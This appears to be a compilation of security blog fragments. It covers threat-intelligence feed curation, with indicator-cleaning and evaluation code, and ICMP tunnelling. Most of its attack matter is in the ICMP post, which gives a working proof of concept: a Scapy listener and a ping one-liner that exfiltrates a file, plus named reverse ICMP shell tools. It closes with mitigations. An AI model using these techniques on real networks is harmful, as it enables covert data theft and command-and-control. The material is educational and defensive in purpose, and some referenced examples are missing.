Context of the Log4Shell Vulnerability to Text4Shell
A year ago, the infamous “Log4Shell” vulnerability in the Log4J logging library of the Apache Logging Services was disclosed. This “Remote Code Execution” (RCE) vulnerability was widely publicized, as the component was widely used and exploiting it was easy. Indeed, Log4Shell was more than just an RCE vulnerability. Depending on the way it was exploited, it could also be used for data exfiltration via protocols such as DNS.
The number of vulnerabilities grows day by day as technologies such as Web applications and Cloud Computing, together with teleworking, are increasingly adopted by organizations: more assets are exposed and connected to the Internet, the attack surface of organizations keeps getting larger, and hackers have shifted their focus from high to medium and low CVSS scores.
FIRST is the Forum of Incident Response and Security Teams. Since 1990, when FIRST was founded, its members have resolved an almost continuous stream of security-related attacks and incidents, including handling thousands of security vulnerabilities affecting nearly all of the millions of computer systems and networks throughout the world connected by the ever-growing Internet.
FIRST brings together a wide variety of security and incident response teams including especially product security teams from the government, commercial, and academic sectors.
TLP stands for Traffic Light Protocol, a protocol created by the Special Interest Group of FIRST (FIRST TLP SIG).
Today’s Context about Covid and Teleworking. How is it going?
Remote working is here to stay, requiring companies to maintain their efforts to combat cyber-attacks. Companies are now requesting security solutions to accommodate this new level of flexibility. To adapt to a changing world, some are embracing hybrid work, while others are opting for full-time telecommuting. The goal is the same: to transparently improve workers’ working conditions regardless of their location.
If having unrestricted access to a customer’s IT assets is an integral part of a service provider’s business, it leaves them vulnerable. By offering comprehensive PAM solutions, distributors will be able to secure, manage and monitor access to their own and their customers’ privileged accounts, keeping their network’s most valuable keys safe.
OSINT stands for Open-Source Intelligence, which is one of the key aspects of understanding cybersecurity. It is a piece of information collected from public sources such as those available on the Internet, although the term is not strictly limited to the Internet, but rather refers to all publicly available sources.
Format Preserving Encryption, named FPE from here on, is a particular form of encryption with the constraint of preserving the initial format. In other words, the output should keep the same format as the input. The format of data can be defined by a charset (named the domain in the article below) and a length. Here are some examples:
A 16-digit card number into a 16-digit number.
A 12-hexadecimal-digit MAC address into a 12-hex-digit number.
In today’s article, we discuss the background of threat intelligence feeds.
Cyber Threat Intelligence (CTI) is stream-based detection of cyber threats, including network anomaly indicators. But this is just the tip of the CTI iceberg, the one consumed by SIEM (Security Information and Event Management) appliances.
It is essential to understand the need to prepare or curate CTI.
At CERT-XLM, we actively refine our CTI feeds. This paper discusses the importance of having usable feeds and how CERT-XLM achieves this.
What is a cyber threat intelligence feed?
Intelligence feeds contain indicators related to an identified or possible threat. CTI indicators are called IoCs (Indicator of Compromise) or IoAs (Indicators of Attack). An IoC is an indicator of a network security breach. They are used to identify malware signatures, known IP addresses or domains, and exploitation of vulnerable products/versions to reactively detect the compromise. An IoA recognizes the intention of attackers as well as suspicious activities that could lead to attacker persistence or lateral movements.
Indicators can be an IP address related to delivering malware, IP addresses corresponding to an attacker’s control servers (hereafter referred to as “C2”), URLs of phishing web pages, names or hashes of malicious files, email addresses, and so on.
Where to get your own cyber threat intelligence feed?
The market for CTI sources is not uniform. Security solutions such as anti-virus, firewalls, or proxy solutions can include proprietary CTI.
VirusTotal [VT], vx-underground [VX], or Abuse.ch [Abuse.ch] are open or public CTI sources that allow the downloading of a variety of samples or IoCs. These platforms are sometimes crowd-sourced with URLs or files submitted by users worldwide.
Platforms such as PhishTank [PhishTank] or OpenPhish [OpenPhish] allow users to report malicious sites that seek to extract user credentials or other sensitive information.
You can create your own CTI platform, which gathers and stores feeds that are relevant to you; this is what CERT-XLM does.
Some feeds are dedicated to one threat, such as OpenPhish for phishing or a particular family of malware for Abuse.ch. In contrast, others offer a wide variety of known threats, such as Malware Information Sharing Platform (MISP).
“Label all the things!”
The name of a threat is essential information for an analyst. There is no universal CTI naming convention, and each major vendor applies its own. For example, “Emotet” can be found under the name “Feodo,” “Heodo,” or “Geodo.” The stealer “Pony” may be labelled “Siplog” or “Fareit.” QakBot is also called “Pinkslipbot,” “QBot,” and “Quakbot.”
There are common categories for indicators like “C2”, “phishing”, “malware”, “RAT”, “ransomware”, “scanner”, and “botnet”. Unfortunately, the categories are not universal. The MISP community platform has the concept of “galaxies”, which each member can define. The result is multiple indicators associated with the same threat.
CERT-XLM uniformly labels all threats based on MISP classification standards. Our curated CTI is then applied consistently through SIEM Use Cases.
Don’t lose control over your Cyber Threat Intelligence Feeds
Low-quality CTI feeds result in low-quality indicators.
Here is an example of a low-quality CTI indicator due to URL formatting issues:
Here is an example of a low-quality CTI indicator due to a content issue as it contains an RFC 1918 reserved IP address:
On line 2, the domain is protected by brackets, a common practice but left to individual preferences: one can also find square brackets instead, or “hxxp” for “http”.
CERT-XLM thoroughly tests, decodes and re-encodes each indicator, cleans it, and discards irrelevant ones.
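As an added illustration of that cleaning step (example code, not CERT-XLM's own tooling), the following normaliser undoes common defanging conventions such as “hxxp” and bracketed dots, parses the result, and discards indicators that point at RFC 1918, loopback or link-local addresses. The defanging patterns and the sample indicators are constructed for the example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Defanging conventions commonly found in feeds (assumed set; extend as needed).
_REFANG = [
    (re.compile(r"^hxxp(s?)://", re.I), r"http\1://"),
    (re.compile(r"\[\.\]|\(\.\)|\{\.\}|\[dot\]|\(dot\)", re.I), "."),
]

_DOMAIN_RE = re.compile(r"[a-z0-9-]+(\.[a-z0-9-]+)+")


def refang(indicator: str) -> str:
    """Undo the usual defanging so the indicator can be parsed normally."""
    value = indicator.strip()
    for pattern, replacement in _REFANG:
        value = pattern.sub(replacement, value)
    return value


def classify(indicator: str):
    """Return (kind, normalised value) with kind in {"url", "domain", "ip"},
    or None when the indicator is unusable: empty, unparsable, or an address
    in a non-routable range (RFC 1918, loopback, link-local, unspecified)."""
    value = refang(indicator)
    if not value:
        return None
    if "://" in value:
        host = urlsplit(value).hostname  # already lower-cased by urlsplit
        kind = "url"
    else:
        host = value.lower().rstrip(".")
        kind = "domain"
    if not host:
        return None
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP: accept only something shaped like a hostname.
        if not _DOMAIN_RE.fullmatch(host):
            return None
        return (kind, value if kind == "url" else host)
    if addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_unspecified:
        return None  # internal address: cannot identify an external threat
    if kind == "url":
        return ("url", value)
    return ("ip", str(addr))


if __name__ == "__main__":
    # Constructed sample feed lines; 95.100.200.5 is an arbitrary public address.
    for sample in ["hxxps://evil[.]example/login", "192[.]168[.]1[.]10",
                   "Evil[.]example.", "95.100.200.5", "http://10.0.0.5/panel"]:
        print(repr(sample), "->", classify(sample))
```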
Come on and grab your own!
Generic CTI content can result in a high volume of false positives.
Looking at the four examples below:
This example is a well-known content hosting service. This service can be abused, but without the exact page qualification path, the domain itself is not malicious.
It is common for attackers to use free online services to host malicious documents. They then invite their victims to download and open them as part of a phishing campaign to avoid detection. Without the identifier (e.g., hxxps://forms.office.com/r/ne89GVwrYE), this is not an indicator of a threat.
is an internal IP address. It corresponds to countless domains: not all of these domains are malicious, and the analyst doing reverse DNS research on it must be able to classify the alert.
is a less common example. This CTI content will generate a lot of alerts in most environments.
CERT-XLM takes extra precautions to avoid CTI content that generates a high volume of false positive alerts.
Adapting your cyber threat intelligence feed to your SIEM’s capabilities
It is important to have Secure Sockets Layer (SSL) decryption as part of your security architecture. Your SIEM will have less useful information if you do not have adequate SSL decryption: only the visited domains will be recorded.
Your SIEM may also have software limitations. The first limitation could be the number of indicators it can ingest at one time. Other limitations will come from the functionalities of the SIEM, as none of them is perfect.
Unfortunately for some SIEMs, no alert will be raised with a visit to the URL https://walletsdappvalidation.com/ when the indicator is “https://walletsdappvalidation.com/?u” as only exact matches are possible.
Test, test and test again
It is essential to validate your CTI content.
CERT-XLM measures CTI content in an isolated environment to reduce the risk of incidents from establishing connections with the indicators.
We then evaluate:
How redundant the indicators are with the flows we already have: measure how many indicators match things already being blocked by your firewalls, proxies, anti-viruses, and other perimeter security solutions in your environment.
What proportion of these indicators will generate false positives? This can be measured offline by looking for the indicators in the extraction of your traffic.
How much reprocessing is required before ingestion by the SIEM? If there is no SSL termination in your traffic, at a minimum, you will need to extract domains from URLs. You will need to think of strategies to counter false positives as described above. Reprocessing will also involve cleaning up some of the recoverable indicators as described in Section 2.2.
What is the proportion of waste? This involves looking for unusable indicators, as described in paragraph 3, to which you can add those that generate false positives.
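The offline measurement described in these four points, as an added example that is not CERT-XLM's own tooling: indicators are reduced to the host a proxy records (the domain-level fallback needed when there is no SSL termination, which also catches the “?u” exact-match problem mentioned above), then counted against a constructed traffic extract to obtain the share of indicators that never match (waste) and the share that match many distinct clients (false-positive candidates). The log format and the hosts other than those named in the article are constructed.

```python
from urllib.parse import urlsplit


def host_of(indicator: str) -> str:
    """Reduce a cleaned URL, domain or IP indicator to the host a proxy log records."""
    if "://" in indicator:
        return (urlsplit(indicator).hostname or "").lower()
    return indicator.lower().rstrip(".")


def parse_proxy_line(line: str):
    """Constructed log format: '<timestamp> <client_ip> <method> <host> <status>'.
    Returns (client_ip, host) or None for malformed lines."""
    parts = line.split()
    if len(parts) != 5:
        return None
    return parts[1], parts[3].lower()


def evaluate_feed(indicators, log_lines, noisy_clients=3):
    """Host-level matching of each indicator against a traffic extract.
    'silent_share' is the proportion of indicators that never matched (waste);
    'noisy' lists indicators seen from at least noisy_clients distinct clients,
    a sign of generic content that will flood the SIEM with alerts."""
    hosts = {ind: host_of(ind) for ind in indicators}
    hits = {ind: 0 for ind in indicators}
    clients = {ind: set() for ind in indicators}
    for line in log_lines:
        parsed = parse_proxy_line(line)
        if parsed is None:
            continue
        client, host = parsed
        for ind, ind_host in hosts.items():
            if host == ind_host:
                hits[ind] += 1
                clients[ind].add(client)
    total = len(indicators)
    silent = [ind for ind in indicators if hits[ind] == 0]
    noisy = [ind for ind in indicators if len(clients[ind]) >= noisy_clients]
    return {
        "hits": hits,
        "silent_share": len(silent) / total if total else 0.0,
        "noisy": noisy,
        "noisy_share": len(noisy) / total if total else 0.0,
    }


# Constructed sample feed and proxy extract (client addresses are internal).
INDICATORS = ["https://walletsdappvalidation.com/?u", "forms.office.com",
              "evil-c2.example", "95.100.200.5"]
PROXY_LOG = [
    "2024-01-01T10:00:00Z 10.1.1.20 GET walletsdappvalidation.com 200",
    "2024-01-01T10:00:05Z 10.1.1.21 GET forms.office.com 200",
    "2024-01-01T10:00:06Z 10.1.1.22 GET forms.office.com 200",
    "2024-01-01T10:00:07Z 10.1.1.23 GET forms.office.com 200",
    "2024-01-01T10:00:09Z 10.1.1.20 CONNECT forms.office.com 200",
    "2024-01-01T10:01:00Z 10.1.1.30 GET intranet.example 200",
    "malformed line",
]

if __name__ == "__main__":
    print(evaluate_feed(INDICATORS, PROXY_LOG))
```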
Only these quantifiable answers will allow you to conclude whether the feed is worthwhile.
CERT-XLM also recommends the use of a passive DNS database. This approach allows extended searches to be performed without consuming SIEM resources. If matches are identified, a search over a short time window in the SIEM, using the full indicator, will allow concluding whether it is a false positive or a true positive.
Cyber threat intelligence feeds: what to conclude?
There are a lot of details to keep in mind when integrating CTI content with a SIEM. This is why CERT-XLM recommends applying a structured approach to curating CTI content.
The ping command is one of the first commands you learned when coming to the IT world. And yet, it is possible that it is still hiding secrets from you.
Through this blog post, I will demonstrate how attackers could use the protocol behind this command to bypass firewall rules leading to data exfiltration or communication with a command and control.
How does the Internet Control Message Protocol (ICMP) work?
The ping command uses the Internet Control Message Protocol (ICMP), which is a supporting protocol in the Internet protocol suite.
It is used by network devices, including routers, to send error messages and operational information indicating success or failure when communicating with another IP address, for example. An error is indicated when a requested service is not available or if a host could not be reached.
In fact, when you use the ping command, two types of control messages are used:
Type 0, which is an Echo Reply.
Type 8, which is an Echo Request.
From RFC 792, which defines ICMP for IPv4, the fields of an echo or echo reply message are the following:
As an attacker, the data field is the useful one for communication. In a usual ping, the data received in the echo request message must be returned in the echo reply message. That’s how we know that a remote host is reachable.
An In-depth examination of the topic
Let’s look at an example: below is a ping initiated from a Windows machine.
Figure 1 – Ping initiated from Windows machine
The ping is successful, and two values in the output should be noticed:
The TTL (Time To Live) value, which could be used to help you identify the kind of OS of the remote machine. For a TTL value <= 64, it’s usually a Unix-based OS.
The bytes value, which is the length of the data; in this case the data is 32 bytes long.
Analysing the same ping using Wireshark showed that each echo request from my Windows machine sends the alphabet by default. As expected, the same data is returned by the remote Linux machine.
Figure 2 – Windows ping analysis
However, sending the alphabet is not mandatory. In fact, the ICMP protocol allows sending any data we want.
To prove it, let’s initiate a ping from the Linux machine this time. By default, the Windows host firewall denies inbound ICMP Echo Requests, so the corresponding rule should be opened.
Figure 3 – Ping initiated from Linux machine
This time we can notice that the TTL value is <= 128. This indicates a reply from a Windows machine.
Analysing the ping showed the alphabet is not sent anymore and the data is longer than 32 bytes.
Figure 4 – Linux ping analysis
However, 48 bytes are still far from the maximum allowed. Indeed, because ICMP is built on top of the IP layer, in its version 4, the maximum size allowed for these packets is 65535 bytes. Removing the headers of IP (20 bytes at least) and ICMP (8 bytes), it is possible to have 65507 bytes of ICMP data.
But if we assume the maximum transmission unit is set to 1500 (which is the default for Ethernet), the maximum payload without fragmentation is limited to 1472 bytes (1500 − 20 − 8). In case of fragmentation, the server should be able to handle multiple ICMP requests and add their data together.
A Simple Proof of Concept (PoC)
As shown in the previous experiment, we can communicate different data of different lengths through ICMP requests and replies. Knowing that, we could exfiltrate the content of a file, or receive commands sent by a command and control server, using ICMP.
However, to do this, we first need to disable ICMP replies on our attacker server by running the following command as root:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
Otherwise, the client is unlikely to receive commands sent from the server, because automatic replies will send back the same data.
Once the command is done, pinging from our Windows machine prints a request timed out, because no data is returned.
Figure 5 – Request timed out because no reply received
Analysing from the Linux machine showed the communication is one-way.
Figure 6 – ICMP automatic replies disabled
Let’s craft a simple Proof of Concept to exfiltrate a file’s content based on ICMP requests. To do this, a very useful Python library named Scapy was used.
Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more.
On the server side, this simple script, which should be run as root, will just listen for ICMP on the wire. For each packet received, it will run the exfiltration function, which parses and collects the last 4 bytes of the ICMP data using the load attribute.
from scapy.all import ICMP, sniff

interface = "eth0"
remote_host = "192.168.23.138"

def exfiltration(packet):
    # Only Echo Requests (type 8) carry the exfiltrated chunk
    if packet[ICMP].type == 8:
        # The last 4 bytes of the ICMP payload hold the chunk sent by the client
        data = packet[ICMP].load[-4:]
        print(data.decode("utf-8"), flush=True, end="")

sniff(iface=interface, filter="icmp and host " + remote_host, store=True, prn=exfiltration)
Client side, on a Linux machine, we could exfiltrate a file using this simple command:
xxd -p -c 4 test.txt | while read line; do ping -c 1 -p "$line" 192.168.23.139; done
Where test.txt is the file we want to exfiltrate. Notice this is very slow because the data is sent 4 bytes at a time; the -p option of the default ping binary allows up to 16 bytes.
Otherwise, we could also use Python and Scapy to send data more rapidly by crafting our own ICMP packets.
Finally, if we were on a Windows machine, the native ping binary has no option to customise the ICMP data. We could run a crafted exe, but there are usually fewer restrictions in company policies on PowerShell, which allows performing this customisation, as in the tool Invoke-PowerShellIcmp.ps1.
Discover a Suite of Complete Tools to get an ICMP shell
The previous PoC is not optimised because it is a one-way communication and not all the data bytes available in the protocol were used. This leads me to introduce a suite of complete tools which fully exploit the ICMP protocol in the form of a shell.
First, Icmpsh, which is a simple reverse ICMP shell with a win32 slave and a POSIX-compatible master in C, Perl or Python2. It does not require administrative privileges to run on the target machine, but an executable has to be dropped on the machine, which can be hard to do in case of endpoint hardening, for example. Furthermore, Invoke-PowerShellIcmp.ps1 is a client compatible with icmpsh and could be more easily dropped on the client machine.
Next, icmpdoor is a shell written with Python3 and Scapy; it comes with an executable to run it directly on Windows.
Below is an example of the above tool running. From the Linux C2 machine, I’m able to run commands on the Windows target machine, through ICMP.
Figure 7 – Connect to the C2 from the victim machine
Figure 8 – Running commands through ICMP tunnelling from the C2
How to mitigate?
You should now ask yourself how to mitigate this. Well, there is a radical option, which consists of blocking ICMP traffic and thus ICMP tunnelling. But in practice, many companies don’t want to lose the ping functionality, which is very useful in many situations for debugging purposes.
Another way to mitigate this type of attack is to only allow fixed-size ICMP packets through firewalls, which can impede this kind of behaviour. But again, an attacker could craft ICMP packets with a length that looks legitimate (e.g. 32 bytes of data).
The best answer, in my opinion, is to disable outgoing ICMP traffic and enable ICMP traffic internally only where it is necessary. Furthermore, defenders should monitor carefully on the wire for suspicious behaviour, such as ICMP requests without the default value as data.
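The last recommendation, monitoring for Echo Requests whose data is not the default, as an added example that is not part of the original post: a small pure-Python checker parses a raw ICMP message, verifies its checksum, and flags an Echo Request whose payload is either oversized or differs from the defaults observed above (the Windows alphabet from Figure 2, and the Linux-style payload, assumed here to be an 8-byte timestamp followed by bytes equal to their offset, as in iputils). The packets used for testing are constructed with a helper included in the block.

```python
import struct

# 32-byte default payload of the Windows ping (Figure 2).
WINDOWS_DEFAULT = b"abcdefghijklmnopqrstuvwxyzabcdef"


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum; a valid message sums to 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_icmp(raw: bytes):
    """Split an ICMP message into (type, code, id, seq, payload).
    Returns None for truncated or corrupt (bad checksum) messages."""
    if len(raw) < 8 or checksum(raw) != 0:
        return None
    icmp_type, code, _csum, ident, seq = struct.unpack("!BBHHH", raw[:8])
    return icmp_type, code, ident, seq, raw[8:]


def looks_like_default_payload(payload: bytes) -> bool:
    """True for the Windows alphabet or an iputils-style payload (assumption:
    8-byte timestamp, then byte i == i & 0xFF for every later offset)."""
    if payload == WINDOWS_DEFAULT:
        return True
    if len(payload) > 8:
        return payload[8:] == bytes(i & 0xFF for i in range(8, len(payload)))
    return False


def suspicious_echo(raw: bytes, max_len: int = 64):
    """Reason string if this Echo Request deserves an alert, else None.
    Replies and non-echo types are ignored; tunnels above rely on type 8."""
    parsed = parse_icmp(raw)
    if parsed is None:
        return None
    icmp_type, _code, _ident, _seq, payload = parsed
    if icmp_type != 8:
        return None
    if len(payload) > max_len:
        return "oversized payload (%d bytes)" % len(payload)
    if not looks_like_default_payload(payload):
        return "non-default payload"
    return None


def build_echo(ident: int, seq: int, payload: bytes, icmp_type: int = 8) -> bytes:
    """Constructed helper: build an ICMP echo message with a valid checksum."""
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload
```

Run against a capture, the checker would be fed the ICMP bytes of each packet (for example via Scapy's `raw(pkt[ICMP])`); the alert thresholds are assumptions to tune per environment.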